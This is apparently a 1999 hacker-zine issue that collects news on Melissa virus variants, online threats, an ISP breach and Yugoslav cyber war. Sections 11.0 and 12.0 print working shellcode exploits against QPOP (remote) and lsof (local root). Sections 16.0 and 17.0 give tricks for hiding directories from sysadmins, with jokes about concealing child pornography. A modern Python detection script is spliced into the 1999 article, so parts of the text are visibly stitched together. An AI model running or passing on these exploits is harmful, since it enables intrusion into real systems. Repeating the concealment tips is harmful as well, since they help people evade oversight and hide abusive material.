There are over 24 variations of the Melissa virus now in existence. Melissa.U[Gen1] is the latest variant which has infected over 40,000 hosts. Experts fear that many more variations are on the horizon.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,1017806,00.html?chkpt=zdnntop

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Melissa finds more fertile ground
By Jim Kerstetter, PC Week
October 22, 1999 1:09 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,1017806,00.html

IT managers wondering why variants of the Melissa virus are proliferating need only look to the field of agriculture for the answer. Farmers know that too much of the same crop is a recipe for disaster. A blight -- a virus -- can wipe out an entire field in no time. Experts call it a monoculture. And that's what the computing environment has become: a monoculture of Windows desktops, connected by Visual Basic programming and Microsoft Office suite macro commands that are easily exploited by willful programmers. Melissa, which spawned in March, now circulates in about 24 versions.
Two more Melissa variants popped up this month; the latest, Melissa.U (Gen1), eluded the most sophisticated anti-virus software. Experts warn many more will come.

Low barriers to entry

"Macro viruses such as Melissa are extremely easy to write," said Carey Nachenberg, chief researcher at Symantec Corp.'s Antivirus Research Center, in Santa Monica, Calif. "Anybody with a manual and a free afternoon could probably write one."

Melissa.U (Gen1) infected at least 40,000 nodes at five companies. The original Melissa grabbed the top 50 addresses off a user's Outlook address book after an infected attachment was opened and started a chain reaction that overloaded servers across the country. A variant, Melissa.U, grabbed only four addresses. But its impact was more severe, wiping out important system commands such as I/O.sys. Melissa.U (Gen1) is a further variation on that virus.

"This was the first of the Melissas to get past our virus software," said Alan Hamilton, IS manager at a West Coast software company. "I guess our saving grace was, for once, people didn't open it."

Just how Melissa.U (Gen1) was created is still a mystery. Most good anti-virus software can catch variants of Melissa using two common detection methods. The first is based on the virus' signature, a piece of code that is unique to that virus. Signature recognition is easy for virus authors to avoid, however. Change a piece of the signature, without actually changing the virus functions, and the signature recognition defense becomes moot. That's why anti-virus software vendors constantly send out software updates.

The second method, called heuristics, isn't so easy to avoid. Heuristic software, which is in use by most major anti-virus software vendors, looks for how a virus behaves -- for example, what dynamic link libraries it writes to -- rather than its specific qualities. Heuristic software, for the most part, has caught Melissa variants.
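To make the two detection methods described above concrete, here is an added example (not code from ZDNN, Symantec or any anti-virus product): a signature check and a behaviour score run over three constructed, inert macro fragments, where renaming the variant's identifiers defeats the signature but not the heuristic. The signature string, the indicator patterns and the threshold are assumptions chosen for the demonstration.

```python
"""Signature vs. heuristic detection of macro-virus variants.

Added example for this article; not code from ZDNN, Symantec or any AV
vendor.  The three macro fragments are constructed, inert text: they only
name the behaviours the article describes (walking an Outlook address book,
sending mail from code, damaging system files) and execute nothing.  The
signature string, indicator patterns and threshold are assumptions.
"""
import re

# Constructed stand-in for the original strain: walks the address book and
# mails itself to the first 50 entries.
ORIGINAL = """\
Private Sub Document_Open()
    Set objOL = CreateObject("Outlook.Application")
    Set objNS = objOL.GetNameSpace("MAPI")
    For ctr = 1 To 50
        objMail.Recipients.Add objNS.AddressLists(1).AddressEntries(ctr)
    Next ctr
    objMail.Send
End Sub
"""

# Constructed variant: identifiers renamed, four recipients instead of 50,
# plus a destructive extra step.  Same behaviour, different bytes.
VARIANT = """\
Private Sub Document_Open()
    Set a1 = CreateObject("Outlook.Application")
    Set n1 = a1.GetNameSpace("MAPI")
    For k = 1 To 4
        m.Recipients.Add n1.AddressLists(1).AddressEntries(k)
    Next k
    m.Send
    Kill "C:\\IO.SYS"
End Sub
"""

# Constructed benign macro: sends one report to a fixed address.
BENIGN = """\
Private Sub SendReport()
    Set objOL = CreateObject("Outlook.Application")
    Set objMail = objOL.CreateItem(0)
    objMail.To = "helpdesk@example.invalid"
    objMail.Send
End Sub
"""

# A signature is an exact substring unique to one known sample.  This one
# depends on the original's variable name and loop bound, so any edit to
# either of them makes the signature miss (constructed, not a real AV entry).
SIGNATURES = {
    "Sample.A (constructed)": "For ctr = 1 To 50",
}

# Behavioural indicators: what the macro does, however it is spelt.
INDICATORS = {
    "enumerates address book": re.compile(r"AddressLists|AddressEntries"),
    "sends mail from code": re.compile(r"\.Send\b"),
    "adds recipients in a loop": re.compile(
        r"For \w+ = \d+ To \d+[\s\S]*?Recipients\.Add"),
    "deletes or overwrites files": re.compile(r"\bKill\b|Open .* For Output"),
}
# One programmatic mail send is normal office automation; flag only when the
# mass-mailing behaviours co-occur (threshold is an assumption).
HEURISTIC_THRESHOLD = 3


def signature_match(text):
    """Return the name of the first known signature found in text, or None."""
    for name, sig in SIGNATURES.items():
        if sig in text:
            return name
    return None


def heuristic_hits(text):
    """Return the behavioural indicators present in text."""
    return [name for name, pat in INDICATORS.items() if pat.search(text)]


def classify(text):
    """'signature' if a known pattern is present, 'heuristic' if enough
    behaviours co-occur, otherwise 'clean'."""
    if signature_match(text):
        return "signature"
    if len(heuristic_hits(text)) >= HEURISTIC_THRESHOLD:
        return "heuristic"
    return "clean"


if __name__ == "__main__":
    for label, sample in (("original", ORIGINAL), ("variant", VARIANT),
                          ("benign", BENIGN)):
        print(f"{label:8s} -> {classify(sample):9s} "
              f"behaviours={heuristic_hits(sample)}")
```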
A novel twist

But Melissa.U (Gen1) didn't behave like the previous forms of Melissa. It used Messaging API commands for opening Outlook address books differently than a typical Melissa variant. Experts are speculating why this happened. It could be because the virus writers who set it loose were a bit more creative than were the original writers, or anti-virus software never fully eradicated the initial Melissa.U strain, according to experts.

And there's no reason that won't happen again. Macro commands, by their nature, are easy to work with. Melissa, which feeds off the macros in Microsoft software, is easy to tinker with. Probably the most disturbing thing about Melissa is its worm exploit -- that is, it has the ability to proliferate more quickly. In addition, it can be easily mutated even by amateur virus writers. Melissa hit the industry's most popular, yet vulnerable software -- Windows, which was designed with connectivity, not security, in mind -- and it's only a matter of time before someone far more skilled and sinister takes advantage of it again.

"What protects us right now," Symantec's Nachenberg said, "are people's ethics."

@HWA

10.0 Online Threats Labeled Cyberterrorism
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

A man in Missouri has had his computer confiscated and will have charges of making threats brought against him. This after he made threats against students and teachers at Townsend's Hawthorne Brook Middle School in Massachusetts. Somehow this was described as a 'Cyberterrorist' act. (Threats on a playground are just threats, threats on the internet are suddenly cyberterrorism.)

Associated Press - Via AltaVista
http://zip2.newsreal.com/cgi-bin/NewsService?osform_template=pages/altavistaStory&refresh=10800&ID=altavista&path=News/Story_1999_10_23.NRdb@2@23@3@63&headerID=1

Online Prowler Targets Mass. Teens
Source: Associated Press

BOSTON (AP) -- Officials say a 19-year-old quadriplegic from Missouri used an Internet chat room to make "Columbine-like" threats to hurt students and teachers at a Massachusetts middle school.

Massachusetts Attorney General Tom Reilly said Saturday that the paralyzed teen -- whose name and hometown were not released -- made the threats using an America Online chat room frequented by dozens of eighth-graders from Townsend's Hawthorne Brook Middle School. Authorities confiscated the Missouri teen-ager's computer on Friday and plan to charge him with making threats and possibly other charges on Monday, Reilly said. He said the teen-ager had been chatting online with the Townsend students since September, but midweek, the cyber-relationship turned terrifying.

Reilly said the man told several students he was in their community and he threatened to hurt them, their teachers and their school. The threats -- which included a list of teachers and students to be targeted -- were an act of "cyberterrorism" that left the school shaken. It may have been a hoax, but "the fear that was expressed by students, parents and teachers in this community was very real," Reilly said.

Reilly said the students had thought the Missouri teen-ager was a peer and included him in their conversations, revealing information about their town, their school and themselves. When the man allegedly directed some students to child pornography Web sites a few days ago, some of the children told their parents, who then called police.

Townsend Superintendent of Schools James McCormick said someone from the community also received a suspicious phone call that made references to the April 20 shootings at Columbine High School in Littleton, Colo., where two students shot and killed 12 students, a teacher and themselves.
Bomb-sniffing dogs searched the middle school on Thursday, and students' bags and backpacks were checked, but nothing suspicious was found and school was declared safe, McCormick said. On Friday, authorities converged on the suspect's home, where he lives with his parents, and confiscated his computer equipment. Reilly said the teen-ager -- paralyzed from the neck down by a high school car crash -- admitted communicating with the Massachusetts students.

Publication date: Oct 23
© 1999, NewsReal, Inc.

11.0 QPOP 2.41beta1 exploit (linux x86) by mastoras
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
 * QPOP 2.41beta1 exploit (linux x86) by mastoras
 * Some code ripped from "mount" exploit by Bloodmask and Vio
 * Assembly code changed so it is not affected by tolower() function.
 *
 * this one sucks (too), but works :>
 * (./qpop 997 4000; cat) | nc your_victim 110
 *
 * 28 Jun 1998
 * mastoras@hack.gr http://www.hack.gr/users/mastoras
 * Mastoras Wins! Fatality!
 */

/* The header names were lost in extraction; restored from what the code uses. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

#define DEFAULT_OFFSET 4000

u_long get_esp()
{
    __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
    u_char execshell[] =
        "\xeb\x26\x5e\x8d\x1e\x89\x5e\x1b\x31\xed\x89\x6e\x17\x89\x6e\x1f"
        "\xb8\x1b\x76\x34\x12\x35\x10\x76\x34\x12\x8d\x6e\x1b\x89\xe9\x89"
        "\xea\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd5\xff\xff\xff"
        "/////////////////bin/sh";

    unsigned long *addr_ptr = NULL;
    unsigned int ret_address;
    char *buff = NULL;
    char *ptr = NULL;
    int BUFFER_SIZE = 997;
    int ofs = DEFAULT_OFFSET;
    int nops = (300/4);         /* number of return-address copies appended */
    int i;

    if (argc > 1) BUFFER_SIZE = atoi(argv[1]);
    if (argc > 2) ofs = atoi(argv[2]);

    buff = malloc(4096);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;

    /* fill start of buffer with nops */
    memset(ptr, 0x90, BUFFER_SIZE - strlen(execshell));
    ptr += BUFFER_SIZE - strlen(execshell);

    /* stick asm code into the buffer */
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];

    /* follow it with repeated copies of the guessed return address */
    addr_ptr = (unsigned long *)ptr;
    ret_address = get_esp() - ofs;
    for (i = 0; i < nops; i++)
        *(addr_ptr++) = ret_address;
    ptr = (char *)addr_ptr;
    *ptr = 0;

    fprintf(stderr, "length %d+%d+%d=%d, address=%x\n",
            BUFFER_SIZE, strlen(execshell), nops,
            BUFFER_SIZE + strlen(execshell) + nops, ret_address);
    printf("%s\n", buff);
    return 0;
}

@HWA

12.0 ls0f.c Vulnerable: linux machines running lsof 4.40
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
 * ls0f.c (c) 1999 Subterrain Security
 * Written by bind - 1999
 *
 * Vulnerable: linux machines running lsof 4.40
 *
 * Cheers to xdr & cripto...
 *
 * *Affected*
 * [ SuSE 6.0 + 5.3 ]
 * [ Debian 2.0 ]
 * [ Redhat 5.2 ]
 *
 */

/* The header names were lost in extraction; restored from what the code uses. */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define LSOF "/usr/sbin/lsof"

char shellcode[] =
    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
    "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
    char code[2001];            /* 2000 bytes plus a terminator for setenv() */
    char ret[29];               /* seven return addresses plus a terminator */
    int offset = 0;             /* original left this uninitialised without an argument */
    int i;
    int len = strlen(shellcode);

    if (argc > 1)
        offset = atoi(argv[1]);

    /* original loop ran i <= 28 and wrote four bytes past the end of ret[] */
    for (i = 0; i < 28; i += 4)
        *(long *)&ret[i] = (unsigned long) get_sp() - offset;
    ret[28] = '\0';

    /* nop sled with the shellcode at the end, exported through the environment */
    memset(code, 0x90, 2000);
    memcpy(code + (2000 - len), shellcode, len);
    code[2000] = '\0';
    setenv("CODE", code, 1);

    execl(LSOF, "lsof", "-u", ret, NULL);
    return 1;                   /* only reached if execl() fails */
}

@HWA

13.0 Free phone calls over the internet in the US
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by sAs-

There is a new company offering free dialing using internet phone technology to make calls over the internet within the US. The catch: you have to be a US citizen (or at least provide US address details) and you have to fill out a standard marketing questionnaire and include your email address. I filled out the form with false info and was allowed into the dialpad system. You will be asked to allow the site to install a new java applet on your computer; allow it to do so and the dialpad applet will be installed automatically in Netscape (or MSIE) 4.5 / 5.0 or higher.
From there on you have the dialpad and using a headset with mic can dial out to any destination in the U.S. Have fun!

http://www.dialpad.com/

@HWA

14.0 Are You a Cyberspace Addict?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench

Internet-Computer Addiction Services is a Redmond WA counseling center that specializes in treating people who are addicted to being online. The founders Jay Parker, Hilarie Cash and others feel that online addiction is just as powerful as gambling, alcohol or drugs.

Seattle Times
http://www.seattletimes.com/news/local/html98/adix_19991024.html

Posted at 01:22 a.m. PDT; Sunday, October 24, 1999

Center offers treatment for growing number of cyberspace addicts

by Ian Ith
Seattle Times Eastside bureau

A 45-year-old corporate chief executive in Seattle finds himself locking himself in his office, holding all his calls and surfing the Internet for pornography for hours on end. A University of Washington student flunks out because he stays up all night - every night - playing online fantasy role-playing adventure games. A homemaker turns on the computer when the kids go to school. When they come home, she's still there, talking about sex with total strangers in an online chat room.

"This is really happening, and it's pretty powerful stuff," said Jay Parker, an Eastside addiction counselor. "This does impact people's lives. They need to start figuring out ways to live with their computers and make it a healthy part of their lives."

So Parker has teamed up with a colleague, psychologist Hilarie Cash, in opening Internet-Computer Addiction Services, a Redmond counseling center that specializes in treating people who just can't kick the online habit. And while some scholars say they doubt that computer obsession rises to the level of a true addiction on par with alcohol or drugs, Cash, Parker and a contingent of highly respected colleagues say it's just as harmful as gambling addiction, and just as costly.
Some estimate that at least 10 percent of heavy Internet surfers are psychologically dependent on cyberspace and need professional help.

"It's a growing thing," said Maressa Hecht Orzack, a Boston clinical psychologist and professor at the Harvard Medical School who is considered the leading expert on computer addiction. "It's a very isolating experience for many people. People who get into this situation will have tried to stop. But they tend to do it compulsively and they can't stop it."

Parker and Cash collaborated after they met at a conference and debated the various methods of treating computer addiction. Both had seen a surge in the number of clients in their regular practices who were finding the Internet affecting their lives. But the idea of computer addiction is so new that there aren't any solid medical studies to support one method or another. In fact, the jury is still out on whether someone can actually be addicted to a computer or whether computer use is just a symptom of some other trouble.

"There's no question that there's some people who are spiraling out of control," said Malcolm Parks, an assistant vice provost for research at the University of Washington. "The question, to me as a researcher, is what would they be doing if they didn't have the Internet. Would they spiral out of control in some other way?

"It's a reach to say the technology is the cause of the addiction," he said. "Why not help them deal with the underlying issues?"

But Cash and Parker say they have seen too many Internet tragedies to dismiss it.

"The social consequences are enormous," said Cash, who has a doctorate in psychology and has treated patients for two decades. "When you neglect your spouse and develop serious marital problems, when your job is neglected, when your kids are neglected, these are serious consequences."

The counselors acknowledge that there's no consensus on how to treat the problem. So they plan to conduct a scientific study of various methods.
Parker thinks 12-step programs, similar to Alcoholics Anonymous, are the most effective. Cash will focus on a more traditional counseling approach. Which technique clients will use will depend on their individual circumstances. While temporarily abstaining from computer use is likely to be necessary to break the habit, both counselors acknowledge that computers are too ingrained in our world for users to become cyber-teetotalers.

"The goal is to have them use the computer the same way a food addict still needs to eat," Parker said. "Our first goal is to get them off the Internet, then our second goal is to address the underlying issues."

And, the counselors hope, they can learn to be like the millions of Web surfers who don't let it rule their lives.

"They find a way to balance it in their lives," Cash said. "That's the difference between someone who becomes an addict and those who don't.

"But there really are people who don't have any apparent pre-existing problems, and they get hooked. It's something we don't fully understand. But it happens. It's a technology that is just powerful."

@HWA

15.0 Congressman Lobbies IETF For Privacy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Brian Oblivion

Representative Bob Barr (R-Georgia) has sent a letter to the chairman of the Internet Engineering Task Force supporting freedom and privacy. He urged the IETF not to assist law enforcement by providing a surveillance architecture in the new Internet technology. The FBI has requested that such technology be built into the new technology to aid in legal wiretaps.

Wired
http://www.wired.com/news/politics/0,1283,32100,00.html

'Don't Help the Snoops'
by Declan McCullagh
10:45 a.m. 25.Oct.99.PDT

The Internet's standards body should not craft technology to aid government surveillance, a prominent conservative congressman says.
Representative Bob Barr (R-Georgia) said that there is no reason for the Internet Engineering Task Force to support wiretapping in the next generation of protocols and that doing so would be "dangerous."

"For the sake of protecting freedom, commerce, and privacy on the Internet, I urge you to draw the line firmly and early, by immediately rejecting any attempts to force a cumbersome, expensive, and dangerous surveillance architecture on the Internet," Barr wrote in a letter to IETF chairman Fred Baker.

Next month, the IETF will decide whether to support government surveillance in the protocols that computers connected to the Internet use to communicate. The FBI has said those standards should support lawful wiretaps.

Barr predicted that if the IETF complies with the FBI's wishes, privacy would be endangered online through back doors in products, law enforcement would be emboldened and demand even more access, and the costs to consumers would rise.

Since his election in 1994, Barr has become a prominent privacy advocate in Congress, frequently siding with the ACLU and denouncing expansions of government power such as FBI demands for "roving" wiretaps. Best known for demanding Clinton's impeachment even before the Lewinsky scandal, Barr has also fought against same-sex marriages and drug legalization.

While Barr's letter is intended to signal that Congress is interested in what has been an internal IETF debate -- and may be the first time that a legislator has ever weighed in on one -- it could have limited impact. The IETF is an international standards-setting body that has long prided itself on being above parochial, national concerns.

Then again, say law enforcement agents, nations have required their telephone companies to support wiretapping, and may require Internet companies to buy snoopable products as more communication takes place online.

"I'm not aware of any country that does not allow for the use of electronic surveillance," an FBI spokesman told Wired News. "This is an issue that has no country bounds."

In discussions on an internal IETF mailing list, some proponents of readily-available wiretapping have said that a 1994 law called the Communications Assistance to Law Enforcement Act, or CALEA, may require Net-telephony companies to support surveillance.

"In my opinion, Internet telephony in its current form falls far short of the statutory definitions in CALEA," Barr said. "Furthermore, based on Congress' intent to do nothing more than maintain the status quo by enacting CALEA, it is questionable whether Internet telephony could ever be appropriately included under the Act's mandates."

Barr indicated he would consider introducing legislation to block the Clinton administration from making any such demands.

@HWA

16.0 The King Of Hidden Directories by Zym0t1c
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Note: This works in *NIX as well, it has been used by warez groups for years to hide warez sites on public servers, but this info is still useful for the average joe that wants to hide stuff from over zealous sysadmins - Ed

Contributed by Zym0t1c

The KING of Hidden Directories

Oct, 18th 1999 - ... Screwing around at school...

If our sysops (relying on NT4) detect any hidden directory, not owned by them, they simply delete it. "They don't like anyone having secrets," was their reason... Sympathetic, eh?

So, I was playing with the little hidden directories trick I've read about some time ago (downloaded from The HackerZ Hideout, http://www.hackersclub.com/km, called 'REAL Hidden Directories' - DOS Trick by kM & mR.dISCO). The following lines are taken from that file.

/******************************** CUT HERE ********************************/

'... In DOS there are 256 characters (i.e. letters, numbers and symbols numbered 0-255). Look in the back of any DOS manual to find these.
When you hold down the ALT key and type the ASCII code from the number pad it will print it to the screen. For example ALT (155) is ¢ and ALT (129) is ü. However, ALT (255) is the NULL character (it is true nothingness). If you create a directory using ALT (255), it will appear to have no name, but... =)...'

/******************************** CUT HERE ********************************/

So, right now everyone can create a *REAL* hidden directory... :) I suggest every newbie (what the hell! I suggest everybody! :)) reading that article since it's so simple and useful... Just grab it at 'http://hackersclub.com/km/newbies/dostrick.txt'. (Appended to this article - Ed)

Conclusion of today's classes: I've found one directory which is totally hidden!

You know that when you create a subdirectory, assuming you use a DOS shell, two directories are created, named '.' and '..'. You can check this by looking at the date and time of creation. The . directory is the current one and the .. directory is used for going one up.

So, what if one created a directory called '..ALT (255)', i.e. '.. '? When you check it, you receive a second .. directory. When the sysops see this, they will get suspicious thinking they've never seen this in their entire lives! A directory with two .. directories! :)) Am I going crazy?

Then, going to explorer, I saw that the directory was not listed, although it wasn't hidden. In DOS, it was listed like any regular .. directory. So, using the attrib +h ..ALT (255), it disappeared in DOS. Using the Show all files (hidden also) option in explorer, it still wasn't listed.

Found it! The KING of hidden directories in DOS, Win95 OSR1, NT3.51 and NT4!!! (and UNIX - Ed)

The negative part is that you can find the directory using the find command, hidden or not. But, you must admit that a sysop must really know what he is looking for, going through all that trouble just for finding that one directory...
Also, when you deltree the directory above (where this hidden directory was created in), it also is removed. So, when you use this trick, use it in a directory where the sysops won't think to find anything. Let's say... \%systemdrive%\system32\ or something similar (if you've got write access).

Remarks:

o I've tried many directories (the class was really boring) using one point with ALT (255), two points and many many other combinations, but this one was the only *REAL* hidden directory...

o Create it under the root directory and hide it for a little fun... If the sysops don't know much of the ASCII table and the combinations used by DOS commands (use of asterisks, ...), they won't be able to delete it easily. BTW: NT 4 doesn't recognize the deltree command. Everyone knows this, but just in case you don't: why don't you create a whole tree of such directories under the root? :)

o Hide it always (attrib +h ..ALT (255)), so the directory is never listed and keep your files away from those ?*%!!!%ckers. :))

o I tested it also under Win98 and the directory was listed as a ~1 directory, both visible under explorer and DOS... Win95 OSR2 and 98 SE will also list it (I think). So, this trick is dead using these versions and probably the next generation of Microsoft OSes.

o Still, you must admit, this one is nice, isn't it? :))

Zym0t1c,

@HWA

17.0 The Hidden Directories text referred to in 16.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

REAL Hidden Directories DOS Trick by kM & mR.dISCO
03/25/97 (screwing around at work)
- This is old but newbies need to know about it -
Another Original from the HackerZ Hideout
www.hackersclub.com/km

======================

OK here is a trick that you can do with your DOS/Windows3.x and Windows 95 machine that works. If you use Windows NT 3.51/NT4.0 or Win95 OSR2 w/FAT 32 this little trick doesn't work. It only works on people who don't know DOS and the ASCII table. Use at your own risk!
If you're trying to hide kiddie porn from the feds and get busted it's not our fault! Maybe we will do another revision of this that will be more malicious to the end user with this hack. I'm sure if you play with it long enough and read your DOS manual maybe you can guess what we are thinking. Send us your own ideas about this trick...we will publish them here if they are good.
======================

What it Does:

This trick can be used to hide data on a computer in a directory. Unless you know how to change to the directory manually you won't be able to access it. (Meaning Windows File Manager and Windows Explorer: although they see it, they can't access it.)

Why it Works:

In DOS there are 256 characters (i.e. letters, numbers and symbols numbered 0-255). Look in the back of any DOS manual to find these. When you hold down the ALT key and type the ASCII code from the number pad it will print it to the screen. For example ALT (155) is ¢ and ALT (129) is ü. However, ALT (255) is the NULL character (it is true nothingness). If you create a directory using ALT (255), it will appear to have no name, but...=)

NOTE: You will not have access to the full character set unless ANSI is loaded. Look in your DOS book, or in WIN 95 help to do this.

How to Do It:

Go to DOS and do these commands

C:
cd\
md {hold ALT (on your numberpad only)} 255    <- this is an ASCII NULL Character
cd ALT 255

and put something in there

-=> If you want to be cruel and evil do something stupid like "ALT-255xxxpics" on a computer at a local CompUsa. See if the idiots could delete the directory or see if there are actual XXX Pics in there.

Limitations:

This can only be created in DOS or a DOS window. If you create this in explorer or file manager it will let you access the directory.

What the Average User Sees:

To test it...go into windows File Manager or Explorer...you will see a C:\_ directory...when you double click it will say : " c:\_ not accessible.
This Folder was moved or removed"

Heheh...If you really want to be bad ATTRIB the directory +H so no one in DOS can see it.

Updated on 6/30/97...

An Email I received by Gizmo

Subject: Limitations using 255
Date: Mon, 30 Jun 1997 01:01:18 -0500

I was just messing around and found the neat dos trick. Not that it really matters but another limitation of the trick is that if the "special directory" is a subdirectory then you can just use "deltree" on the parent directory. Here's an even simpler method... Say you make a directory called "trick" inserting the null character in front. Just type "deltree *trick". And it's gone!

===============================================================================================

Why should I use this?

- Good for kids who want to hide porn from mommy and daddy!
- If you're a tech support person you know how lame users can be. This is handy for making backups of configurations and covering your ass.
- It's probably also good to pull batch file pranks and such on unsuspecting lamers that use the 16 bit file manager in Windows 95. (that one was for you Wyle)

It's a small hack...but it's for newbies who need to learn even the littlest of things count. If you have a small hack you think newbies should know please send it to km@hackersclub.com

@HWA

18.0 Cable + Wireless Security Compromised
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lady Sharrow

Cable & Wireless Communications, a major ISP in England, has had its security breached. A database containing the personal information of 150,000 users was reportedly compromised. The database included e-mail addresses, passwords and telephone numbers. Cable & Wireless is unsure how the breach occurred but is investigating.

UK Telegraph
http://www.telegraph.co.uk/et?ac=001576828917683&rtmo=qudtuRt9&atmo=9999LpL9&pg=/et/99/10/25/nhack25.html

Hacker spins a worldwide web of security fears
By Sally Pook

CONCERNS about the security of the internet deepened yesterday after a hacker claimed to have broken into a database containing the personal details of more than 150,000 users.
Cable & Wireless Communications promised an immediate investigation into what appeared to be a "very serious breach of security". The hacker claimed to have used the information, including e-mail addresses, passwords and telephone numbers, to break into the web sites of 100 users yesterday. He said he did it to expose poor security at Cable & Wireless Communications, a subsidiary of the telecoms group.

Clifford Longley, a columnist with The Daily Telegraph, found all his files had disappeared from his web site. He said: "All my articles had been deleted. I rang a helpline and the person on the telephone just said 'Oh my God'."

Mr Longley was greeted by a notice on his web site from the hacker saying: "Looking for your homepage? It has been taken off the server. Nothing personal but this has been done to expose Cable & Wireless's poor security."

The hacker claimed he had broken into a "normal" internet site containing details of more than 150,000 customers and said he had revealed the web address.

Yesterday, a spokesman for Cable & Wireless Communications said: "We don't know why this has happened or how but we will investigate it as soon as possible. Customers' details are kept on an internal system, but if these claims are true, we will have to look at how these details got on to the internet."

Two months ago, Hotmail, one of the biggest e-mail providers, was closed by its operator Microsoft after a security breach allowed anyone to read subscribers' messages.

@HWA

19.0 Yugo Cyber War Not As Widespread As First Thought
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Recent statements by high level military officials regarding the use of electronic techniques during the US - Yugoslavian war have increased conjecture as to what actually occurred. Rumors have spread about everything from implanting viruses to draining bank accounts. However, according to the commander of U.S.
air forces in Europe, cyber attacks were mainly focused on military air defense systems. This article goes on to explore the legal aspects of attacks on other countries' computer systems and claims that Operation Uphold Democracy in Haiti in 1994 was the first American penetration of foreign computer networks.

Washington Post
http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm

The Cyber Bomb in Yugoslavia

By William M. Arkin
Special to washingtonpost.com
Monday, October 25, 1999

Gen. Henry Shelton, chairman of the Joint Chiefs of Staff, told reporters Oct. 7 that the United States waged information warfare as part of the NATO bombing campaign earlier this year. His confirmation fueled media conjecture that American hackers plundered Yugoslav bank accounts and took other Clancy-esque actions against Slobodan Milosevic's networks and infrastructure.

But I have learned from high-level Defense Department sources that the U.S. did not penetrate any banking networks. What is more, the Pentagon's own top legal office believes that such attacks may be unlawful.

Operations against Yugoslav computer systems were focused on military air defense systems. Gen. John Jumper, commander of U.S. air forces in Europe, confirmed this to Aviation Week and Space Technology in August.

Concerns about international legal constraints on electronic information warfare have so far deterred American government hackers from exercising their full capabilities. Moreover, the Pentagon says it is hampered by a lack of a national information operations vision and strategy. "The conduct of an integrated campaign was delayed by the lack of both advance planning and strategic guidance defining key objectives," its Kosovo after-action review released this month says.

Have Your Lawyer Call My General

While bombs were falling in Yugoslavia, the Pentagon Office of General Counsel finished a 50-page internal "Assessment of International Legal Issues in Information Operations."
Though it notes that it is "by no means clear what information operations (IO) techniques will end up being considered to be 'weapons'" in the eyes of the international community, the traditional law of war applies to military-inspired "computer network attack."

"Offensive IO are governed by the same legal principles" that govern the use of force, according to retired Marine Corps lawyer Walter "Gary" Sharp, Shelton's former deputy legal counsel responsible for information war. These include maintaining the distinction between combatants and noncombatants, and the doctrine of military necessity. "What we cannot do kinetically we cannot do electronically," Sharp says.

Accordingly, the Pentagon's May assessment states that "stock exchanges, banking systems, universities, and similar civilian infrastructures may not be attacked simply because a belligerent has the ability to do so." Under the principle of military necessity, to go after Milosevic's and his cronies' bank accounts, whether with bombs or bits, requires that "the attacking force can demonstrate that a definite military advantage is expected from the attack."

Noting the "current formative period" of information warfare, the Pentagon appraisal warns of the possibility that "efforts will be made to restrict or prohibit information operations by legal means."

Your Wish is Our Command

Knowledgeable military sources say that Yugoslavia is not the first American penetration of foreign computer networks. Computers were broken into and exploited during Operation Uphold Democracy in Haiti in 1994, according to sources. President Clinton personally approved the operation.

Since Haiti, these same sources said, a number of "relatively low key" computer exploitations have accompanied other peacekeeping operations. Many of these have been little more than high-tech intelligence collection missions.
In many other cases, says one insider, the Joint Staff office of "special technical operations" prepared "approval packages" for the Secretary of Defense and the President, but the "process took so long the operations were overtaken by events and we didn't engage in them."

System Access To What End

When Yugoslavia turned into a hot war, air planners at U.S. European headquarters worked in San Antonio with the Joint Command and Control Warfare Center (JC2WC--known as "jake-wick" in the military) to devise a scheme to insert false messages and targets into the centralized air defense command network. But political hesitations in the approval process stood in the way of the operation beginning with the opening bombing salvos on March 24.

A Top Secret U.S.-only operation to penetrate the Yugoslav air defense system was approved soon after the bombing began, Air Force sources say. Here would be the first test of a new weapon and capability in combat.

At the same time though, NATO was surprised when Yugoslav radar operators did not turn on their systems. Evidently learning from Iraq, they kept a low "electronic profile," thus thwarting the traditional electronic attack with anti-radiation missiles and jammers. This was fortunate for the cyber-warriors, for it made a computer penetration all the more important if it could confuse or disable the network of surface-to-air missiles.

But by the time all of the pieces of the information war were in place, enough physical damage had been done to Yugoslav bunkers and command lines that it became difficult to isolate and assess the impact of the cyber attack.

For Gary Sharp and other legal specialists in this burgeoning field of information warfare, Yugoslavia merely stands as another demonstration that computer network attack will eventually become an integral part of the way warfare is waged. "We have not fully realized the breadth of the capabilities and the potential," Sharp says. The General Counsel report agrees.
